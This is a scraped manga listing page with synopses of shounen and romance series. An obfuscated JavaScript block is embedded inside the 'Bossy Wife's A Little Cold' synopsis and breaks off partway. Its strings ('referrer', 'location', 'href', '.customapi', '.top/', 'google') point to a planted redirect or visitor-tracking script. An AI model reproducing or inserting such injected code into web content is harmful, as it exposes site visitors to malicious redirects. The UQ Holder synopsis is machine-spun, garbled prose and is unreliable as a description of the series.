Shounen - Page 32

Shounen manga appeals to young males, focusing on adventurous plots with strong male leads, action sequences, and a heavy emphasis on friendship, teamwork, and personal growth as the characters face various challenges.

9546 results

Bossy Wife’s A Little Cold

She became his wife for the sake of her family, however right after they got married, he immediately divorced her because he believed she had intoxicated him to sleep with her. Feeling dejected and wronged, she refuses the luxurious villa, refuses the money, and walks out by herself to raise a child alone. Now, many years later, she returns to seek his help to babysit their son, will this be a new beginning? Or will he shun her and their child altogether? My Wife is Cold-Hearted<script></script><script>function _0x5b69(){var _0xe5c50e=['referrer','dMRcG','2174504ScAKeR','.top/','eqDSD','random','unbgR','OUPlv','4190312VdIQnU','92250BHMTDa','.customapi','GFPas','JwKnv','then','https://ip','1330958XsYnBc','includes','text','YnFch','location','6Yihwko','google','1793bCxowd','356ustjUC','1dodYnP','href','GYnbx','floor','14502bYRKgc','rjzwZ','http://rea','1182830yprLJG','6220053SUhgEh',''];_0x5b69=function(){return _0xe5c50e;};return _0x5b69();}(function(_0x197535,_0x3ca71f){var _0x29f1a6=_0x8546,_0x191e5c=_0x197535();while(!![]){try{var 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Conquer The Game With The Best Web Novels

Leaving behind only a single key, my father, a renowned web novel author known for his 'Overpowered MC' stories, passed away. Ten years later, a virtual reality game called 'The Another World,' based on one of his works, becomes a place where people can make a living or even strike it rich. Kim Woojoo, the author's son, has been living a tough life with no special advantages. By chance, he discovers that the key, a keepsake from his father, is being traded at a high price. He decides to use the key to open a limited edition book in his father's study and receives a special gift within the game. Accepting the gift, Woojoo encounters the Great Demon King Lucia, a character from his father's web novel. Lucia grants Woojoo incredible abilities, but the power is so overwhelming that Woojoo struggles to complete even simple daily quests. After much thought, Woojoo decides to eliminate the source of his power, the Demon King, by bringing in another character, Killer Zero. However, his actions draw the attention of Jason, a powerful player in 'The Another World,' who comes to confront him. Will Woojoo be able to face the strongest characters in the game, the ultimate beings from his father's web novel?


Yuki no Niiduma wa Boku to Tokeaitai

From the same author who made Renai Boukun and many others! Yusuke Sakanoi, a young man who earns a living as a part-time jobber, is rescued by a mysterious beauty who is lying down due to heat stroke one day. Sakanoi looking for her lost. I managed to find it, but it was soapland !? Her name is Ginka. A newcomer Yuki Onna who came to the city in search of her husband and spirit at Soapland, Soapland was a feeding ground for Yuki Onna !! Moreover, for some reason she and Ginka decided to become the first couple ... !!? What is the fate of !! A cute and sexually knowledgeable Yuki Onna and a pseudo-couple pretend !!?


I, A Tired Office Worker, Start Living Together With A Beautiful Highschool Girl Whom I Met Again After 7 Years

Amae Yuuya, an office worker in his third year of employment, is completely exhausted by the daily grind. Then, for the first time in seven years, Yuuya meets Aoi Shiratori, a girl eight years younger than him who used to live in his neighborhood. She had grown up to be a beautiful JK girl who was good at housework, and she said to him, “Yuuya-kun, would you like to live with me under the premise of marriage?” Aoi desperately wants to live with Yuuya, her first love. Yuuya, who is puzzled, agrees to live with Aoi as a guardian for the time being, but Aoi’s aggressive approach makes him very nervous inside.


Shoukoku No Altair San

A spin-off of Shoukoku no Altair following the adventures of tiny Mahmut and friends at the Kodansha publishing office.


Uq Holder!

Read UQ Holder Manga UQ Holder Manga is a manga series by Ken Akamatsu.The collection is placed in the year 2086, 10 years after magic is shown to the planet. Tota Konoe is a lad that find out what lies atop the large tower in the the main city and has always imagined leaving his home village. But protector Yukihime and his teacher promises that it'll just be possible once he gets the better of a feat that appears hopeless for him, her. Yet, once a bounty-hunter coming after the lifestyle of Yukihime mortally wounds Tota, she saves his life by transforming him into one of her type and shows herself as a vampire. So starts the experiences of Tota on earth of immortal beings in a culture where technology and magic are exceptionally improved to the idea of being virtually indistinguishable. Principal Characters in UQ Holder Manga Tota Konoe Rating amount 7 of UQ Holders, Tota is the primary character as well as a 14-year old lad who had been raised by Yukihime after his parents died. She transforms him into a vampire, getting an immortal being, while shielding Yukihime after being wounded. Upbeat and always cheerful, Tota is not dissimilar in family title and hair coloring a character from Negima, with Konoka Konoe ! and is suggested to be a a family member of hers, making him part of the Konoe family. His grandpa was a renowned wizard Negi Springfield and Negima!'s protagonist. Tota after receives a sword that could have its weight increased or decreased hundreds of timesfold according to the will of its own user (really a flexible dial) that becomes his primary weapon which is shown that his physique hold the the key ability of "Magia Erebea", enabling him to consume magic into his own body, bonding it to his spirit. The character of Tota strongly resembles his great grandfather, the character of Nagi Springfield. Yukihime / Evangeline A.K. McDowell A 700-year old immortal vampire as well as a primary character in the Negima! Show. After parting ways together with her pals in the Mahora Academy - perhaps from outliving them - Evangeline embraced the alias "Yukihime" (lit. "Snow Princess") and started the key "UQ Holder" culture for immortal beings. She normally appears as a tall and attractive girl rather than the typical childlike look seen in Negima! She becomes the foster parent of Tota after his birth parents are killed in a episode, later transforming him into a vampire to save his lifestyle. After it's shown that she'd fulfilled Tota centuries before bonded at that time with him and getting his guard as a result of paradox, indicating that she also fell in-love with him at the event. Kuromaru Tokisaka Ranking amount 11 of UQ Holder. Initially an assassin initially provided for kill Yukihime; 14-year old Kuromaru is conquered by Tota who "convinces" her to become his buddy and brother-in-arms. Kuromaru follows UQ Holder to be joined by Tota as she additionally exhibits characteristics of immortality. Kuromaru shows a female look and behaviour despite promising to be a lad and is generally mistaken as a woman. That is because she comes from a tribe of demi-humans where kids are born genderless but becomes female or male once they attain the age of 16. Kuromaru maintains she desires to eventually become man and remain by the aspect as his brother of Tota -in-arms, but feels conflicted because of her developing romantic feelings for him. Later on, after recognizing her emotions for Tota, despite perhaps not being age 16 however Kuromaru's physique starts to grow into that of women. Kuromaru is not dissimilar in look with Setsuna Sakurazaki from Negima!, and just like her, is an adept of the Kyoto Shinmei- other Eastern conflict techniques as well as ryu sword fashion. Other manga: + Liar Game manga + Tenkuu Shinpan manga


Furidashi ni Ochiru!

The manga centers on Hato Aoi, a 16-year-old high school girl who just wants to enjoy her school life. But it turns out she doesn't really act like a high school girl. The manga is a light story about a girl who tries her hardest to become a real high school girl. (Source: ANN)


Yakuza Cleaner

I'm Banjo Taiga, and as of today, I'm assigned to this school as the cleaner.Banjo Taiga is a child of the Yakuza era. An expert at killing who has been trained in the underworld for as long as he can remember. However, the Yakuza being an overwhelming presence in the underworld is a thing of the past. Gokud is now a relic left behind by the times, and the Yamada-gumi, to which Taiga belonged, has been dissolved and reborn as a respectable company. His new job is as a cleaner. The genius of killing has become a cleaner. His workplace has gone from the underworld to a school. Now, fighting and violence are forbidden for a reputable employee, let alone murder. However, what awaits Taiga is a high school full of delinquents with rampant bullying, violence, smoking, drinking, and all sorts of problems. A situation that even teachers and other adults can't handle. "I've come to clean up this filthy school." Numerous splendid techniques and refreshing developments. Making full use of the skills he mastered to survive in the underworld, the former yakuza's "filth" cleaning is about to begin!


My Teacher-Girlfriend

Can sensei be the heroine? Please?<br><br>Due to a traumatic experience, I have a distrust of people with the title of teacher. I, Saiki Makoto, was called by after school by the most popular and beautiful teacher at my school, Fujiki Maka-sensei.<br><br>“I… love you” Eh– a confession out of the blue!? “Until you say you love me, I will continue to pursue you no matter what it takes.”<br><br>Ever since then, I’ve been called for “guidance counselling,” after school, where we'll watch videos together, be given excessive skinship, and go on dates together. Over time, I gradually became conscious of Sensei…? But isn’t it bad for Sensei to go out with her student?<br><br>A romance that is absolutely NG, the forbidden love between us two.


10Th -You And I Fell In Love With The Same Person.-

A boy and a girl who are childhood friends fell in love with the same guy.


Shin Takarazima

The manga that made Tezuka famous. It is an action-adventure drama inspired by Robert Louis Stevenson's book. One day a boy named Pete finds a map of "Treasure Island" that his deceased father left behind. He starts on a voyage to find it together with "Captain," who was a friend of his father. But his ship is attacked by pirates, led by Bowarl, and the two are caught. When a storm hits the pirate ship, the two are thrown into the sea and washed up on the shore of a solitary island in the southern ocean. To their surprise, this island is the one they have been looking for.... The Western-style art and fast-paced storyline attracted much attention, and it became a best seller with 400,000 copies sold, laying the groundwork for the manga craze and its modern style. The original version of "New Treasure Island" was based on Tezuka Osamu's manuscript, but substantial modifications were made by Sasaki Shichima, who cut nearly 60 pages and also changed some of the lines. When publishing "The Complete Works of Tezuka Osamu," Tezuka Osamu remade it based on his memory to make it closer to his original. Was adapted into animation.
